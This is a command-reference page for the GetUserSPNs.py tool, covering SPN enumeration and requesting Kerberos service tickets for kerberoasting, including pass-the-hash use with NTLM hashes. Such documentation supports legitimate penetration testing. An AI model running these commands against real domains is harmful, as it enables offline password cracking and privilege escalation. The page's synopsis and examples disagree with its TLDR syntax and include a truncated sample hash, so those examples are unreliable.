LinuxCommandLibrary

getuserspns.py

Enumerate Service Principal Names (SPNs)

TLDR

Enumerate user accounts with an SPN and request their Kerberos TGS tickets

$ GetUserSPNs.py [domain]/[username]:[password] -dc-ip [domain_controller_ip]
copy

Use pass-the-hash authentication
$ GetUserSPNs.py [domain]/[username] -hashes [LM_Hash]:[NT_Hash] -dc-ip [domain_controller_ip]
copy

Save the output to a file
$ GetUserSPNs.py [domain]/[username]:[password] -dc-ip [domain_controller_ip] -outputfile [output_file]
copy

Request only TGS tickets
$ GetUserSPNs.py [domain]/[username]:[password] -dc-ip [domain_controller_ip] -request
copy

Request only TGS tickets using pass-the-hash authentication
$ GetUserSPNs.py [domain]/[username] -dc-ip [domain_controller_ip] -hashes [LM_Hash]:[NT_Hash] -request
copy

SYNOPSIS

python getuserspns.py [-dc ] [-u ] [-p ] [-hashes :] [-outputfile ] [-request]

PARAMETERS

-dc
    The IP address or hostname of the domain controller to connect to. If not specified, the script attempts to discover one automatically.

-u
    The username to authenticate with when querying Active Directory. Required unless using the -hashes option.

-p
    The password for the provided username. Required unless using the -hashes option.

-hashes :
    NTLM hashes (LM:NT) for authentication. This option allows authentication without providing a cleartext password.

-outputfile
    Specifies a file to save the output (list of SPNs) to.

-request
    Requests a Kerberos ticket for found SPNs, which is necessary for kerberoasting.

DESCRIPTION

The getuserspns.py script is a Python tool often used in penetration testing and security auditing. Its primary function is to identify and retrieve Service Principal Names (SPNs) associated with user accounts within an Active Directory environment.

By querying Active Directory, the script attempts to find SPNs that are registered to regular user accounts instead of service accounts. This is significant because SPNs are used to locate services within the network, and when a user account owns an SPN, it becomes a potential target for Kerberoasting attacks. Kerberoasting allows an attacker to request service tickets for those SPNs, crack the associated password offline, and potentially gain access to the user's account, which could lead to privilege escalation within the domain.

The script facilitates identifying accounts that may be vulnerable to this attack vector, improving an organization's security posture by highlighting misconfigurations or unintended SPN assignments.

CAVEATS

The script requires appropriate permissions to query Active Directory. It also relies on the impacket library and other dependencies.

The effectiveness of Kerberoasting attacks depends on the strength of the passwords used and the ability to crack them. Always use strong passwords and consider implementing password complexity policies.

USAGE EXAMPLES

  • Enumerate SPNs using a username and password: python getuserspns.py -u user1 -p Password123
  • Enumerate SPNs using NTLM hashes: python getuserspns.py -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376e664
  • Enumerate SPNs and save the output to a file: python getuserspns.py -u user1 -p Password123 -outputfile spns.txt
  • Request tickets for the found SPNs to prepare for kerberoasting: python getuserspns.py -u user1 -p Password123 -request

SEE ALSO

kerberos(1), ldapsearch(1)

Copied to clipboard